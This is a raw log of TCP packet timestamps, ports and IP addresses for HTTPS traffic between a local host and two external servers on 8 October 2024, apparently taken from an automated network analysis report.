                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.367484093 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.367559910 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.367580891 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.367594004 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.396763086 CEST44349167188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.396842003 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.398741961 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.398755074 CEST44349167188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.405776978 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.405786037 CEST44349167188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.422792912 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.422833920 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.422990084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.422990084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.422990084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423011065 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423089981 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423111916 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423173904 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423173904 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423183918 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423228979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443661928 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443697929 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443802118 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443814039 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443937063 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443958998 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444017887 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444017887 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444025993 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444299936 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444327116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444381952 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444391012 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444410086 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.450109959 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.450133085 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.450223923 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.450233936 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.451724052 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.451750040 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.451781034 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.451792955 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.451803923 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.454467058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.454488039 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.454554081 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.454554081 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.454566002 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.460661888 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.520090103 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.520114899 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.520200014 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.520221949 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.520301104 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.520338058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.520389080 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.520389080 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.520396948 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.530531883 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.530555964 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.530651093 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.530661106 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.530720949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.530849934 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.530874014 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.530936003 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.530936956 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.530944109 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.531327009 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.531362057 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.531413078 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.531413078 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.531420946 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.537025928 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.537056923 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.537127018 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.537127018 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.537137032 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.538537025 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.538568974 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.538609982 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.538609982 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.538619041 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.541295052 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.541320086 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.541376114 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.541376114 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.541385889 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.608895063 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.608935118 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.608978987 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.608989954 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.609013081 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.609601974 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.609627962 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.609669924 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.609669924 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.609678984 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.609880924 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.617690086 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.617714882 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.617763042 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.617789984 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.617794991 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.617896080 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.617923975 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.617944002 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.617950916 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.617994070 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.618308067 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.618329048 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.618366957 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.618366957 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.618376970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.624043941 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.624151945 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.624155998 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.624176025 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.624236107 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.625675917 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.625701904 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.625756979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.625756979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.625765085 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.628248930 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.628278017 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.628329992 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.628329992 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.628339052 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.671513081 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.696139097 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.696185112 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.696268082 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.696268082 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.696279049 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.696428061 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.696456909 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.696491003 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.696499109 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.696562052 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.704557896 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.704585075 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.704629898 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.704648972 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.704659939 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.704786062 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.704814911 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.704859018 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.704859018 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.704869986 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.705271959 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.705293894 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.705317974 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.705324888 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.705343008 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.705343008 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.710839033 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.710880041 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.710927010 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.710927010 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.710935116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.712627888 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.712651014 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.712685108 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.712697983 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.712712049 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.715123892 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.715152025 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.715183973 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.715198994 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.715223074 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783138990 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783169031 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783253908 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783253908 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783268929 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783436060 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783463001 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783479929 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783485889 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783494949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.783518076 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791397095 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791428089 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791488886 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791490078 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791496992 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791836023 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791863918 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791879892 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791892052 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791903019 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.791917086 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.792351007 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.792372942 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.792393923 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.792402029 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.792413950 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.797698975 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.797728062 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.797765970 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.797784090 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.797792912 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.799503088 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.799525976 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.799560070 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.799577951 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.799587965 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.802062988 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.802090883 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.802136898 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.802144051 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.802155018 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.834494114 CEST44349167188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.834624052 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.835027933 CEST44349167188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.835087061 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.835810900 CEST44349167188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.835879087 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.835944891 CEST44349167188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.835995913 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.870537043 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.870563984 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.870692015 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.870712042 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.870757103 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.870783091 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.870827913 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.870827913 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.870836020 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.878549099 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.878571987 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.878684044 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.878694057 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.879108906 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.879133940 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.879184008 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.879184008 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.879192114 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.879467964 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.879498959 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.879556894 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.879556894 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.879565001 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.884994030 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885023117 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885077000 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885096073 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885134935 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885134935 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885134935 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885154009 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885164976 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885164976 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885164976 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.885196924 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.886882067 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.886907101 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.886945963 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.886955023 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.886965990 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.889734030 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.889763117 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.889802933 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.889821053 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.889839888 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.958847046 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.958870888 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.959022045 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.959038973 CEST44349166207.241.227.242192.168.2.22
